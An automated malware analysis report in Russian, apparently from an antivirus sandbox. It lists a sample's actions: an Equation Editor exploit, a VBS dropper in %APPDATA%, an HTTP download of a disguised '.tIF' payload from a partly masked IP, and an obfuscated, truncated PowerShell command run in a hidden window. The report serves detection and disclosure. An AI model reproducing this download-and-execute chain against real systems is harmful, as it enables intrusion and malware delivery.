Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\nicegirlsheneedbuttersmoothbetterth.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\nicegirlsheneedbuttersmoothbetterth.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '19#.#10.150.15':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://19#.#10.150.15/50/nicegirlsheneedbuttersmoothbetterthings.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J䷘ ㊜ ⼣ ⍎ ⊡Bp䷘ ㊜ ⼣ ⍎ ⊡G0䷘ ㊜ ⼣ ⍎ ⊡YQBn䷘ ㊜ ⼣ ⍎ ⊡GU䷘ ㊜ ⼣ ⍎ ⊡VQBy䷘ ㊜ ⼣ ⍎ ⊡Gw䷘ ㊜ ⼣ ⍎ ⊡I䷘ ㊜ ⼣ ⍎ ⊡䷘ ㊜ ⼣ ⍎ ⊡9䷘ ㊜ ⼣ ⍎ ⊡C䷘ ㊜ ⼣ ⍎ ⊡䷘ ㊜ ⼣ ⍎ ⊡JwBo䷘ ㊜ ⼣ ⍎ ⊡HQ䷘ ㊜ ⼣ ⍎ ⊡d䷘ ㊜ ⼣ ⍎ ⊡Bw䷘ ㊜ ⼣ ⍎ ⊡... (со скрытым окном)
